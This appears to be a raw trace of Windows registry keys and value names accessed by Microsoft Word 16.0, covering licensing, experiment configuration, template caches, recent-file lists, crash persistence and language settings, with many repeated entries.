{30CAC893-3CA4-494C-A5E9-A99141352216}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
winword.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF
Word_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
}k!
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\24184
24184
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word
WordName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
FileTypeBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
OoxmlConverterBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
BuildNumber
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.6
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.7
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.9
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.10
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.11
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.14
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.16
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.17
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.18
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.19
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.20
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.21
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.22
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.23
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.24
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.25
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.26
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.27
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.28
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.29
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.30
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
VersionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
ETag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
DeferredConfigs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
ConfigIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTimeWord
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTimeWord
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851216
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328884
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090430
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457444
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033917
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328893
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328905
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851217
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328908
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328916
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033921
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457464
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998158
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM01840907
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457475
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001114
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851218
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851219
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851220
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851221
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851222
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998159
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851223
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851224
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033927
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457485
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457491
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851225
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457496
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001115
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328932
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328935
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457503
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328940
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328998
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457510
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851227
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033929
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328972
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328951
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM02835233
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328975
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328983
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328986
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851226
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033937
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328990
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457515
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090434
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-CH
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-CH
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet
msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
SessionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
FilePath
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
StartDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
EndDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018400CF081ADAB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328986
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328972
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851224
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328884
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851223
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328935
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090430
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457444
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851218
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328975
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328951
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328990
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851227
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328908
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998158
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328905
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851222
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851217
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851226
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851225
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851219
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457491
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328916
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090434
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851221
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457496
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328998
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851216
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328893
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001115
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM01840907
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM02835233
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328932
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457475
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851220
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328940
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328983
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457515
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457503
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033917
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457510
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001114
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
